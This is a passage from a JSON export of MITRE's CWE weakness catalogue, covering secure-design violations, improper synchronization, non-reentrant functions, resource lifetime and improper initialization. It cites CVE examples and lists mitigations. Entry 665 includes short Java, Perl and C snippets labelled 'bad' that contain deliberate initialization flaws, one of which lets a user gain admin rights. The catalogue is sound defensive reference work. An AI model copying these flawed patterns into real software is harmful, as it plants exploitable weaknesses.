attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4068"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-544"}}]},"Notes":{"Note":{"#text":"Note that there is a close relationship between this weakness and CWE-603 (Use of Client-Side Authentication). If developers do not believe that a user can reverse engineer a client, then they are more likely to choose client-side authentication in the belief that it is safe.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Reliance on Security through Obscurity","attr":{"@_Date":"2009-01-12"}}}},"657":{"attr":{"@_ID":"657","@_Name":"Violation of Secure Design Principles","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product violates well-established principles for secure design.","Extended_Description":"This can introduce resultant weaknesses or make it easier for developers to introduce related weaknesses during implementation. Because code is centered around design, it can be resource-intensive to fix design problems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-546"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-01-30","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"662":{"attr":{"@_ID":"662","@_Name":"Improper Synchronization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software utilizes multiple threads or processes to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes.","Extended_Description":{"xhtml:p":"Synchronization refers to a variety of behaviors and mechanisms that allow two or more independently-operating processes or threads to ensure that they operate on shared resources in predictable ways that do not interfere with each other. Some shared resource operations cannot be executed atomically; that is, multiple steps must be guaranteed to execute sequentially, without any interference by other processes. Synchronization mechanisms vary widely, but they may include locking, mutexes, and semaphores. When a multi-step operation on a shared resource cannot be guaranteed to execute independent of interference, then the resulting behavior can be unpredictable. Improper synchronization could lead to data or memory corruption, denial of service, etc."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"362","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use industry standard APIs to synchronize your code."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG00-C","Entry_Name":"Mask signals handled by noninterruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG31-C","Entry_Name":"Do not access shared objects in signal handlers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"State synchronization error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"25"}},{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}},{"attr":{"@_CAPEC_ID":"29"}}]},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Synchronization","attr":{"@_Date":"2010-09-27"}}}},"663":{"attr":{"@_ID":"663","@_Name":"Use of a Non-reentrant Function in a Concurrent Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a non-reentrant function in a concurrent context in which a competing code sequence (e.g. thread or signal handler) may have an opportunity to call the same function or otherwise influence its state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Memory","Read Memory","Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use reentrant functions if available."},{"Phase":"Implementation","Description":"Add synchronization to your non-reentrant function."},{"Phase":"Implementation","Description":"In Java, use the ReentrantLock Class."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"29"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-547","@_Section":"Class ReentrantLock"}},{"attr":{"@_External_Reference_ID":"REF-548"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences"}],"Previous_Entry_Name":[{"#text":"Use of a Non-reentrant Function in an Unsynchronized Context","attr":{"@_Date":"2010-09-27"}},{"#text":"Use of a Non-reentrant Function in a Multithreaded Context","attr":{"@_Date":"2010-12-13"}}]}},"664":{"attr":{"@_ID":"664","@_Name":"Improper Control of a Resource Through its Lifetime","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not maintain or incorrectly maintains control over a resource throughout its lifetime of creation, use, and release.","Extended_Description":{"xhtml:p":["Resources often have explicit instructions on how to be created, used and destroyed. When software does not follow these instructions, it can lead to unexpected behaviors and potentially exploitable states.","Even without explicit instructions, various principles are expected to be adhered to, such as \\"Do not use an object until after its creation is complete,\\" or \\"do not use an object after it has been slated for destruction.\\""]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static analysis tools to check for unreleased resources."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO39-C","Entry_Name":"Do not alternately input and output from a stream without an intervening flush or positioning call","Mapping_Fit":"CWE More Abstract"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"196"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}},{"attr":{"@_CAPEC_ID":"62"}}]},"Notes":{"Note":{"#text":"More work is needed on this entry and its children. There are perspective/layering issues; for example, one breakdown is based on lifecycle phase (CWE-404, CWE-665), while other children are independent of lifecycle, such as CWE-400. Others do not specify as many bases or variants, such as CWE-704, which primarily covers numbers at this stage.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Control of a Resource Through its Lifetime","attr":{"@_Date":"2009-05-27"}}}},"665":{"attr":{"@_ID":"665","@_Name":"Improper Initialization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used.","Extended_Description":"This can have security implications when the associated resource is expected to have certain properties or values, such as a variable that determines whether a user has been authenticated or not.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"This weakness can occur in code paths that are not well-tested, such as rare error conditions. This is because the use of uninitialized data would be noticed as a bug during frequently-used functionality."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If security-critical decisions rely on a variable having a \\"0\\" or equivalent value, and the programming language performs this initialization on behalf of the programmer, then a bypass of security may occur."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized data may contain values that cause program flow to change in ways that the programmer did not intend. For example, if an uninitialized variable is used as an array index in C, then its previous contents may produce an index that is outside the range of the array, possibly causing a crash or an exit in other environments."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Initialization problems may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, in Java, if the programmer does not explicitly initialize a variable, then the code could produce a compile-time error (if the variable is local) or automatically initialize the variable to the default value for the variable\'s type. In Perl, if explicit initialization is not performed, then a default value of undef is assigned, which is interpreted as 0, false, or an equivalent value depending on the context in which the variable is accessed."]}},{"Phase":"Architecture and Design","Description":"Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values."},{"Phase":"Implementation","Description":"Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some conditions might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile your software with settings that generate warnings about uninitialized variables or data."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"attr":{"@_Demonstrative_Example_ID":"DX-106"},"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1471","Description":"chain: an invalid value prevents a library file from being included, skipping initialization of key variables, leading to resultant eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2008-3637","Description":"Improper error checking in protection mechanism produces an uninitialized variable, allowing security bypass and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3637"},{"Reference":"CVE-2008-4197","Description":"Use of uninitialized memory may allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197"},{"Reference":"CVE-2008-2934","Description":"Free of an uninitialized pointer leads to crash and possible code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2007-3749","Description":"OS kernel does not reset a port when starting a setuid program, allowing local users to access the port and gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3749"},{"Reference":"CVE-2008-0063","Description":"Product does not clear memory contents when generating an error message, leading to information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063"},{"Reference":"CVE-2008-0062","Description":"Lack of initialization triggers NULL pointer dereference or double-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2008-3688","Description":"chain: Uninitialized variable leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-3475","Description":"chain: Improper initialization leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3475"},{"Reference":"CVE-2008-5021","Description":"Composite: race condition allows attacker to modify an object while it is still being initialized, causing software to access uninitialized memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-3597","Description":"chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2009-2692","Description":"chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2009-3620","Description":"chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incorrect initialization"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR02-C","Entry_Name":"Explicitly specify array bounds, even if implicitly defined by an initializer"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"DCL00-J","Entry_Name":"Prevent class initialization cycles"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status 